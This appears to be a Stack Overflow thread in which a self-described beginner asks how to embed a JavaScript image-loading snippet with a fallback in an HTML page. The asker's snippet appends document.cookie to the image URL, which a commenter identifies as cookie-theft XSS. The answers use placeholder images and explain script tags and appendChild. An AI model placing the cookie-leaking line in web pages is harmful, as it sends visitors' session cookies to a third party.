# How would I add this JS into a HTML page?

Tags: javascript, html

I've got this JS code, which should load another image if the one it tries to load first takes too long:

```
var image = new Image();
image.src = "firstimage.jpg?cookie=" + encodeURI( document.cookie );
setTimeout
(
    function()
    {
        if ( !image.complete || !image.naturalWidth )
        {
            image.src = "backupimage.jpg";
        }
    },
    1000
);
```

I can't figure out how to put it into my HTML though (I only have VERY basic HTML skills!) Would anybody be able to show me?

Many thanks in advance

Comment: Post the HTML, please

Comment: Do you want to add the image to HTML? You can use `document.body.appendChild(image)` for that.

Comment: Am I the only one getting alarm bells at `"firstimage.jpg?cookie=" + encodeURI(document.cookie)`? I mean that's *textbook* cookie-theft XSS...

Answer (score 1):

Assuming that you have added the Javascript on the page, you can inject the image to the body of the page using `document.body.appendChild(image)`.

Or, if you wanted to inject the image into an element other than body, you could use `element.appendChild(image)`.

```js
var image = new Image();
image.src = "//placehold.it/300";
setTimeout
(
    function()
    {
        if ( !image.complete || !image.naturalWidth )
        {
            image.src = "//placehold.it/200";
        }
    },
    5000
);
document.body.appendChild(image);
// document.getElementById("myDiv").appendChild(image);
```

```html
<div id="myDiv"></div>
```

Comment: I don't understand why it's working in your snippet but not on my page :-( - I have the JS in a <script> tag in the header, then <div id="myDiv"></div> like your example, but no image loads :(

Comment: Did you call `document.body.appendChild(image);` at the end of your Javascript? Or, `document.getElementById("myDiv").appendChild(image);`?

Comment: I tried each one, with exactly your code - so I should be seeing the placehold.it images, but i'm not, and I can't work out why...

Comment: Check the errors in Browser's Dev tools (F12 or Ctrl + Shift + I).

Comment: I'm getting: "TypeError: document.getElementById(...) is null"

Comment: That means you don't have `<div id="myDiv"></div>` on your page. Try with `document.body.appendChild(image);` first, to see if the image is added to body. And if it works, try adding `<div id="myDiv"></div>` to HTML, and then see if the image is getting added.

Comment: I do have that div! It's finally showing when I try using  document.body.appendChild(image);

Comment: Let us [continue this discussion in chat](http://chat.stackoverflow.com/rooms/163106/discussion-between-nisarg-shah-and-unluckyforsome).

Answer (score -1):

## HTML `<script>` tag

To add `javascript` or other scripts, use the `<script>` tags:

```
<script>
//code here
</script>
```

But do be aware that if any **HTML** elements are accesed with your JS, you must place the script after them so that they are loaded and exist (or use a delaying function on the document load).

Check the [documentation](https://www.w3schools.com/tags/tag_script.asp)

Answer (score -2):

You can use the HTML `<script>` Tag.

The `<script>` tag is used to define a client-side script (`JavaScript`).

You use it like this:

```
<script>
    //write your script here
</script>
```

Or create a function on load like this:

```
window.onload = function() {
         yourFunction(param1, param2);
  };
```